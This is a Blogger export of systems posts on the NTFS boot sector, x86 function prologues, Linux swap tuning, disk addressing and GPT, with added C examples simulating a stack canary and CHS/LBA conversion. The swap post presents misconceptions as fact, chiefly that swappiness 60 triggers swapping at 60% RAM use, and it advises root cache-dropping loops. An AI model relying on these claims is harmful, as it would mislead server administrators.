<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZmNonP4531gr7qMyNdniQp2Mfg1e4zh3jqN984CFjirgGaxc9SuOMYFvV-lQ_ndkqiYDTZJBEGDhz9t7dSUxs8s9kyGj-fpSPcinbDPF2NmrBxRkH-wynRKIwtcI7NZt65mNpYJfT1sHL/s1600/ntfs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZmNonP4531gr7qMyNdniQp2Mfg1e4zh3jqN984CFjirgGaxc9SuOMYFvV-lQ_ndkqiYDTZJBEGDhz9t7dSUxs8s9kyGj-fpSPcinbDPF2NmrBxRkH-wynRKIwtcI7NZt65mNpYJfT1sHL/s1600/ntfs.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<table cellpadding="0" cellspacing="0" class="ntfs-features-more" style="background-color: white; box-shadow: rgb(255, 255, 255) 1px 0px 0px; color: black; font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 16px; margin-bottom: 0px; margin-top: 50px; padding: 0px; width: 99%px;"><tbody>
<tr><th align="center" style="padding: 0px 0px 10px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
Byte Offset</div>
</th><th align="center" style="padding: 0px 0px 10px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
Field Length</div>
</th><th align="center" style="padding: 0px 0px 10px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
Field Name</div>
</th></tr>
<tr><td align="center" class="color" style="background-color: whitesmoke; border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px 2px 2px 5px;">0x00</td><td align="center" class="color" style="background-color: whitesmoke; border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px 2px 2px 5px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
3 bytes</div>
</td><td align="center" class="color" style="background-color: whitesmoke; border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px 2px 2px 5px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
Jump Instruction</div>
</td></tr>
<tr><td align="center" style="border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px;">0x03</td><td style="border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
LONGLONG</div>
</td><td style="border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
OEM ID</div>
</td></tr>
<tr><td align="center" class="color" style="background-color: whitesmoke; border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px 2px 2px 5px;">0x0B</td><td align="center" class="color" style="background-color: whitesmoke; border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px 2px 2px 5px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
25 bytes</div>
</td><td align="center" class="color" style="background-color: whitesmoke; border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px 2px 2px 5px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
BPB</div>
</td></tr>
<tr><td align="center" style="border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px;">0x24</td><td style="border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
48 bytes</div>
</td><td style="border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
Extended BPB</div>
</td></tr>
<tr><td align="center" class="color" style="background-color: whitesmoke; border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px 2px 2px 5px;">0x54</td><td align="center" class="color" style="background-color: whitesmoke; border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px 2px 2px 5px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
426 bytes</div>
</td><td align="center" class="color" style="background-color: whitesmoke; border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px 2px 2px 5px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
Bootstrap Code</div>
</td></tr>
<tr><td align="center" style="border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px;">0x01FE </td><td style="border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
WORD</div>
</td><td style="border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
End of Sector Marker</div>
</td></tr>
</tbody></table>
</div>
<br /></div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-25174089376479210432013-01-08T12:14:00.000-08:002013-01-08T12:14:46.740-08:00Function's Prologue and Epilogue <div dir="ltr" style="text-align: left;" trbidi="on">
In assembly language programming, the function prologue is a few lines of code at the beginning of a function, which prepare the stack and registers for use within the function. Similarly, the function epilogue appears at the end of the function, and restores the stack and registers to the state they were in before the function was called. The prologue and epilogue are not a part of the assembly language itself; they represent a convention used by assembly language programmers, and compilers of many higher-level languages. They are fairly rigid, having the same form in each function. Sometimes, the function prologue and epilogue also contain buffer overflow protection code.<br />
<br />
<br />
A function prologue typically does the following if the architecture has a base pointer (also known as frame pointer) and a stack pointer (these actions may not apply to architectures that lack a base pointer or stack pointer):<br />
=>Pushes the old base pointer onto the stack, so that it can be restored later (the new base pointer, which is set in the next step, always points to this saved value).<br />
=>Assigns the value of the stack pointer (which points to the saved base pointer and the top of the old stack frame) to the base pointer, so that a new stack frame is created on top of the old stack frame (i.e. the top of the old stack frame becomes the base of the new stack frame).<br />
=>Moves the stack pointer further by decreasing or increasing its value, depending on whether the stack grows down or up. On x86, the stack pointer is decreased to make room for variables (i.e. the function's local variables).<br />
As an example, here's a typical IA-32 assembly language function prologue as produced by GCC:<br />
<b>pushl %ebp </b><br />
<b>movl %esp,%ebp </b><br />
<b>subl $N,%esp</b><br />
<b><br /></b>
<b><br /></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXs-FE53dOL16JRaSaK6hvhw98ON9WVWOENyy_zYu0Vu8vlFLfYga0weDUodgg9azSVp9FCsM4I86mY4oaF9HjuYQ14yGc8ARv5SJ2xoKPfrrsPMoBnj4h8V37c5alWtcrG-IRvM53Vmoj/s1600/x86-registers.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXs-FE53dOL16JRaSaK6hvhw98ON9WVWOENyy_zYu0Vu8vlFLfYga0weDUodgg9azSVp9FCsM4I86mY4oaF9HjuYQ14yGc8ARv5SJ2xoKPfrrsPMoBnj4h8V37c5alWtcrG-IRvM53Vmoj/s1600/x86-registers.png" height="300" width="400" /></a></div>
<b><br /></b>
<b><br /></b>
The function epilogue reverses the actions of the function prologue and returns control to the calling function. It typically does the following (this procedure may differ from one architecture to another):<br />
=>Replaces the stack pointer with the current base (or frame) pointer, so the stack pointer is restored to its value before the prologue<br />
=>Pops the base pointer off the stack, so it is restored to its value before the prologue<br />
=>Returns to the calling function, by popping the previous frame's program counter off the stack and jumping to it<br />
The given epilogue will reverse the effects of either of the above prologues (either the full one, or the one which uses enter). For example, these three steps may be accomplished in 32-bit x86 assembly language by the following instructions (using AT&T syntax):<br />
<b>movl %ebp,%esp </b><br />
<b>popl %ebp </b><br />
<b>ret</b><br />
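The prologue and epilogue above, modelled step by step in C on a simulated 32-bit stack (an added example, not code from the original post). It goes one step further and models the buffer overflow protection mentioned at the start as a simplified stack canary; STACK_TOP, CANARY, the code addresses and all function names are assumptions made for this illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define STACK_TOP 0x1000u       /* constructed: simulated stack is mem[0..0xFFF] */
#define CANARY    0xC0FFEE00u   /* constructed: real canaries are random per process */

struct cpu {
    uint32_t esp, ebp, eip;
    uint8_t  mem[STACK_TOP];
};

static void cpu_init(struct cpu *c) {
    memset(c, 0, sizeof *c);
    c->esp = STACK_TOP;         /* empty stack */
    c->ebp = 0;                 /* 0 marks the outermost frame */
    c->eip = 0x401000;          /* constructed code address */
}

static void push32(struct cpu *c, uint32_t v) {
    c->esp -= 4;                /* the x86 stack grows down */
    memcpy(&c->mem[c->esp], &v, 4);
}

static uint32_t load32(const struct cpu *c, uint32_t addr) {
    uint32_t v;
    memcpy(&v, &c->mem[addr], 4);
    return v;
}

static uint32_t pop32(struct cpu *c) {
    uint32_t v = load32(c, c->esp);
    c->esp += 4;
    return v;
}

/* call: push the return address, then jump to the target */
static void do_call(struct cpu *c, uint32_t target, uint32_t ret_addr) {
    push32(c, ret_addr);
    c->eip = target;
}

/* pushl %ebp ; movl %esp,%ebp ; subl $N,%esp */
static void prologue(struct cpu *c, uint32_t n) {
    push32(c, c->ebp);          /* saved %ebp ends up at [ebp], return address at [ebp+4] */
    c->ebp = c->esp;
    c->esp -= n;
}

/* movl %ebp,%esp ; popl %ebp ; ret */
static void epilogue(struct cpu *c) {
    c->esp = c->ebp;
    c->ebp = pop32(c);
    c->eip = pop32(c);
}

/* Protected prologue: the same steps, plus a canary at ebp-4, just above the locals. */
static void prologue_protected(struct cpu *c, uint32_t n) {
    push32(c, c->ebp);
    c->ebp = c->esp;
    push32(c, CANARY);
    c->esp -= n;
}

/* Protected epilogue: refuse to return (-1) if the canary was overwritten. */
static int epilogue_protected(struct cpu *c) {
    if (load32(c, c->ebp - 4) != CANARY)
        return -1;              /* a real program would abort here */
    epilogue(c);
    return 0;
}

/* Model an unchecked copy of len bytes into the locals, starting at %esp. */
static void fill_locals(struct cpu *c, uint8_t byte, uint32_t len) {
    for (uint32_t i = 0; i < len && c->esp + i < STACK_TOP; i++)
        c->mem[c->esp + i] = byte;
}

int main(void) {
    struct cpu c;
    cpu_init(&c);
    do_call(&c, 0x402000, 0x401005);
    prologue(&c, 16);
    printf("in callee: saved ebp=%#x return address=%#x\n",
           (unsigned)load32(&c, c.ebp), (unsigned)load32(&c, c.ebp + 4));
    epilogue(&c);
    printf("after ret: esp=%#x ebp=%#x eip=%#x\n",
           (unsigned)c.esp, (unsigned)c.ebp, (unsigned)c.eip);

    do_call(&c, 0x402000, 0x401005);
    prologue_protected(&c, 16);
    fill_locals(&c, 0x41, 28);  /* 12 bytes past the 16-byte locals area */
    printf("protected epilogue returned %d\n", epilogue_protected(&c));
    return 0;
}
```

Because the locals sit below the saved base pointer and the return address, a write that runs past them reaches the canary first, which is why the check belongs in the epilogue, before ret consumes the return address.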
<br />
<br />
</div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-3147925148092164182013-01-05T04:13:00.001-08:002013-01-05T04:13:21.148-08:00SWAP AND CACHE DROP PUZZLE SOLVED<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1wtXumukRthynrjQlPo_E7aMOQ_kIw_f_uLPGd1jq2UlcPkj4uG_5VdoKsJRo1OBVQ3gCm9W73ZLLcIQDpASZQTmiInGx7CrFr_HdACTumMGMMN3y0z3ucO1bBNvoQhCiMV7xUxcPAt6u/s1600/memory.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1wtXumukRthynrjQlPo_E7aMOQ_kIw_f_uLPGd1jq2UlcPkj4uG_5VdoKsJRo1OBVQ3gCm9W73ZLLcIQDpASZQTmiInGx7CrFr_HdACTumMGMMN3y0z3ucO1bBNvoQhCiMV7xUxcPAt6u/s1600/memory.jpg" height="315" width="400" /></a></div>
<br />
<br />
In high performance computing it is common for applications to keep all of their data in physical memory to meet performance requirements. When multiple processes communicate, as we know, shared memory serves as the fastest way of IPC. Any such typical application would initialize the shared memory by loading the data from the disk into the shared memory. Now a question arises: what is the maximum data size that an application can hold in physical memory, of course, without swapping? For the sake of discussion, if we are given 100 GB of RAM, at most how many gigabytes of physical memory (RAM) can I allocate to my data, keeping in mind that the less I allocate, the more boxes I would require to split the data gallery?<br /><br />As a test, I wrote a small app to do what I described above. As it loaded around 30 GB of data into RAM, the kernel started using swap. After loading 40 GB, the swap usage increased exponentially, and at one point the box stopped responding and I had to physically bounce it (unplug it and plug it in again). This didn't make sense to me at the beginning. First, why would the kernel swap if there is enough RAM? I did a man proc and searched for "swap". I happened to read about <b>/proc/sys/vm/swappiness</b> - a parameter which defines the kernel's tendency to swap. The default value of swappiness on Ubuntu 8.04 is 60. As the "used" RAM size reaches 60% of the total RAM size, the kernel would begin to swap. In my case, 60% of 100 GB is 60 GB. But my data size was 30 GB when the kernel started to swap. Where did the remaining 30 GB go, eventually leaving my box in a non-responsive state?! Again this intrigued me to do a further search. I could not find the relation between the data size and the memory required to store it. A few more runs and close memory monitoring showed that the kernel caches all the data (yes, almost all the data that was used very recently). 
Thus, if an application has loaded 2 GB of data into memory, the kernel would cache 4 GB: 2 GB for the actual shared memory data and 2 GB of unused cache through which the data was read/copied into the shared memory. On a typical server environment (runlevel 3), you wouldn't expect this to happen, since apart from the main apps no other applications will be running (like yum-updatesd, vlc, rhythmbox, etc). One would expect the kernel to drop the unused cache immediately. The proc man page again showed one other important parameter - <b>/proc/sys/vm/drop_caches</b>. This entry point is helpful in instructing the kernel to drop the unused cache. <br />To free pagecache:<br /><b> # echo 1 > /proc/sys/vm/drop_caches </b><br />To free dentries and inodes:<br /> <b># echo 2 > /proc/sys/vm/drop_caches </b><br />To free pagecache, dentries and inodes:<br /><b> # echo 3 > /proc/sys/vm/drop_caches </b><br /><br />
When an application loads all the data into memory during its initialization and then never reads the disk again, drop_caches is a real boon. In my case above, I was able to load 90 GB of data into the shared memory and share it with the other processes. The technique was to clear the cache frequently as the application initialized. <br /><b>while :; do echo 3 > /proc/sys/vm/drop_caches; sleep 30; done </b><br />As a rule of thumb, swappiness must be set to 0 (echo 0 > /proc/sys/vm/swappiness or via sysctl.conf) before the application starts, and drop_caches must be set to 3 periodically to avoid any kind of swapping and performance degradation. Once the app has been initialized and all 90 GB has been loaded into memory, the while loop that drops the unused cache is no longer needed and can be terminated safely. But the moment you do a huge file read, don't forget to run the script in the background, of course, as root. The need for drop_caches depends entirely on your application. Setting swappiness to 0 is ideal in my opinion for all server environments where you have to run only specific applications.<br /></div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-24015413768314836412013-01-04T01:44:00.000-08:002013-01-04T01:44:37.687-08:00Block Addressing In Hard Drives<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/9eMWG3fwiEU?feature=player_embedded' frameborder='0'></iframe></div>
<div class="separator" style="clear: both; text-align: left;">
A hard disk drive (HDD) is a data storage device used for storing and retrieving digital information using rapidly rotating discs (platters) coated with magnetic material. An HDD retains its data even when powered off. Data is read in a random-access manner, meaning individual blocks of data can be stored or retrieved in any order rather than just sequentially. An HDD consists of one or more rigid ("hard") rapidly rotating discs (platters) with magnetic heads arranged on a moving actuator arm to read and write data to the surfaces.</div>
<div class="separator" style="clear: both; text-align: left;">
The following two schemes are used to address locations on a hard drive that store data:</div>
<div class="separator" style="clear: both;">
<b>1:)Logical block addressing (LBA)</b> is a common scheme used for specifying the location of blocks of data stored on computer storage devices, generally secondary storage systems such as hard disks.</div>
<div class="separator" style="clear: both;">
LBA is a particularly simple linear addressing scheme; blocks are located by an integer index, with the first block being LBA 0, the second LBA 1, and so on.</div>
<div class="separator" style="clear: both;">
<table border="1" class="wikitable" style="background-color: #f9f9f9; border-collapse: collapse; border: 1px solid rgb(170, 170, 170); color: black; font-family: sans-serif; font-size: 13px; line-height: 19.200000762939453px; margin: 1em 0px; text-align: center;"><caption style="font-weight: bold;">LBA and CHS equivalence with 16 heads per cylinder</caption><tbody>
<tr><th style="background-color: #f2f2f2; border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">LBA Value</th><th style="background-color: #f2f2f2; border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">CHS <i>Tuple</i></th></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">0 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">0, 0, 1</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">0, 0, 2</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">2 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">0, 0, 3</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">62 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">0, 0, 63</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">945 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">0, 15, 1</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1007 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">0, 15, 63</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1008 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1, 0, 1</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1070 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1, 0, 63</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1071 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1, 1, 1</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1133 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1, 1, 63</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1134 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1, 2, 1</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">2015 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1, 15, 63</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">2016 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">2, 0, 1</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">16,127 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">15, 15, 63</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">16,128 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">16, 0, 1</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">32,255 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">31, 15, 63</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">32,256 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">32, 0, 1</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">16,450,559 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">16319, 15, 63</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">16,514,063 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">16382, 15, 63</td></tr>
</tbody></table>
</div>
<div class="separator" style="clear: both;">
CHS (cylinder/head/sector) tuples can be mapped to LBA address with the following formula:</div>
<div class="separator" style="clear: both; text-align: center;">
<img alt="LBA=((C \times HPC) + H ) \times SPT + S -1 " src="http://upload.wikimedia.org/math/0/5/b/05bdb7a8e2026eae4b7da9e23fb63c40.png" /></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
where,</div>
<div class="separator" style="clear: both;">
C, H and S are the cylinder number, the head number, and the sector number</div>
<div class="separator" style="clear: both;">
LBA is the logical block address</div>
<div class="separator" style="clear: both;">
HPC is the maximum number of heads per cylinder (reported by disk drive, typically 16 for 28-bit LBA)</div>
<div class="separator" style="clear: both;">
SPT is the maximum number of sectors per track (reported by disk drive, typically 63 for 28-bit LBA)</div>
<div class="separator" style="clear: both;">
LBA addresses can be mapped to CHS tuples with the following formula:</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<img alt="\begin{align}
C &= LBA \div ( SPT \times HPC )\\
H &= ( LBA \div SPT ) \, \bmod \, HPC \\
S &= ( LBA \, \bmod \, SPT ) + 1
\end{align}" src="http://upload.wikimedia.org/math/9/9/c/99cc5b1a90399d50a8d96f68203b5580.png" /></div>
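Both formulas above as C functions, checked against rows of the table in this post and against the 255-head geometry that fdisk reports in the partition table post (an added example, not code from the original post). The struct and function names are assumptions; the input validation (sectors numbered from 1, head below HPC) follows from the definitions of S and HPC.

```c
#include <stdint.h>
#include <stdio.h>

struct chs { uint32_t c, h, s; };
struct geometry { uint32_t hpc, spt; };   /* heads per cylinder, sectors per track */

/* LBA = ((C x HPC) + H) x SPT + S - 1. Returns -1 for a tuple the geometry cannot hold. */
static int chs_to_lba(struct geometry g, struct chs a, uint64_t *lba) {
    if (g.hpc == 0 || g.spt == 0) return -1;
    if (a.s < 1 || a.s > g.spt)   return -1;   /* sectors are numbered from 1 */
    if (a.h >= g.hpc)             return -1;   /* heads are numbered from 0 */
    *lba = ((uint64_t)a.c * g.hpc + a.h) * g.spt + (a.s - 1);
    return 0;
}

/* C = LBA / (SPT x HPC), H = (LBA / SPT) mod HPC, S = (LBA mod SPT) + 1 */
static int lba_to_chs(struct geometry g, uint64_t lba, struct chs *out) {
    if (g.hpc == 0 || g.spt == 0) return -1;
    uint64_t c = lba / ((uint64_t)g.spt * g.hpc);
    if (c > UINT32_MAX) return -1;
    out->c = (uint32_t)c;
    out->h = (uint32_t)((lba / g.spt) % g.hpc);
    out->s = (uint32_t)(lba % g.spt) + 1;
    return 0;
}

/* Rows taken from the "LBA and CHS equivalence with 16 heads per cylinder" table. */
static const struct { uint64_t lba; struct chs a; } page_table[] = {
    {0, {0, 0, 1}},       {62, {0, 0, 63}},     {945, {0, 15, 1}},
    {1007, {0, 15, 63}},  {1008, {1, 0, 1}},    {1071, {1, 1, 1}},
    {2016, {2, 0, 1}},    {16127, {15, 15, 63}}, {32256, {32, 0, 1}},
    {16450559, {16319, 15, 63}}, {16514063, {16382, 15, 63}},
};

/* Convert every row in both directions and count disagreements with the table. */
static int table_mismatches(void) {
    const struct geometry g = {16, 63};
    int bad = 0;
    for (size_t i = 0; i < sizeof page_table / sizeof page_table[0]; i++) {
        uint64_t lba;
        struct chs a;
        if (chs_to_lba(g, page_table[i].a, &lba) != 0 || lba != page_table[i].lba)
            bad++;
        if (lba_to_chs(g, page_table[i].lba, &a) != 0 || a.c != page_table[i].a.c ||
            a.h != page_table[i].a.h || a.s != page_table[i].a.s)
            bad++;
    }
    return bad;
}

int main(void) {
    const struct geometry fdisk_geo = {255, 63};   /* "255 heads, 63 sectors/track" */
    struct chs a;
    printf("table mismatches: %d\n", table_mismatches());
    if (lba_to_chs(fdisk_geo, 30041550, &a) == 0)  /* start sector of /dev/sda2 */
        printf("LBA 30041550 -> C=%u H=%u S=%u\n", a.c, a.h, a.s);
    return 0;
}
```

The same LBA maps to different tuples under different geometries, so a CHS value is only meaningful together with the HPC and SPT it was computed with.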
<div class="separator" style="clear: both; text-align: left;">
<b>2:)Cylinder-head-sector</b>, also known as CHS, was an early method for giving addresses to each physical block of data on a hard disk drive. In the case of floppy drives, for which the same exact diskette medium can be truly low-level formatted to different capacities, this is still true.</div>
<div class="separator" style="clear: both;">
Though CHS values no longer have a direct physical relationship to the data stored on disks, virtual CHS values (which can be translated by disk electronics or software) are still being used by many utility programs.</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbvcKeD-XpEhvVB57gOkKwnU7duYmWaAIUMqAqubFaDzclI-r64wO1eJ1Vn1B0Tgcxa9haG39JvFFadR1k89J1SE1np4x5xvhrMeQT4oIoi0xmkyKBBbB8yEdzJxh1k0et1FaShmctys2a/s1600/Cylinder_Head_Sector.svg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbvcKeD-XpEhvVB57gOkKwnU7duYmWaAIUMqAqubFaDzclI-r64wO1eJ1Vn1B0Tgcxa9haG39JvFFadR1k89J1SE1np4x5xvhrMeQT4oIoi0xmkyKBBbB8yEdzJxh1k0et1FaShmctys2a/s1600/Cylinder_Head_Sector.svg.png" height="320" width="296" /></a></div>
</div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-25971766120306483242013-01-02T11:01:00.002-08:002013-01-02T11:02:43.155-08:00BACKUP PARTITION TABLE <div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">In computer hardware, GUID Partition Table (GPT) is a standard for the layout of the partition table on a physical hard disk. Although it forms a part of the Extensible Firmware Interface (EFI) standard (Intel's proposed replacement for the PC BIOS), it is also used on some BIOS systems because of the limitations of MBR partition tables, which use 32 bits for storing logical block addresses and size information. For disks with 512-byte sectors, the MBR partition table entries allow up to a maximum of 2.20 TB (2.20 × 10<sup>12</sup> bytes) or 2 TiB−512 bytes (2,199,023,255,040 bytes or 4,294,967,295 (2<sup>32</sup>−1) sectors × 512 (2<sup>9</sup>) bytes per sector).[1] GPT allocates 64 bits for logical block addresses and therefore allows a maximum disk and partition size of 2<sup>64</sup>−1 sectors. For disks with 512-byte sectors, that would be 9.4 ZB (9.4 × 10<sup>21</sup> bytes)[1][2] or 8 ZiB−512 bytes (9,444,732,965,739,290,426,880 bytes or 18,446,744,073,709,551,615 (2<sup>64</sup>−1) sectors × 512 (2<sup>9</sup>) bytes per sector).</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">You can back up the partition table in the following two ways.</span><br />
<div class="separator" style="clear: both; text-align: center;">
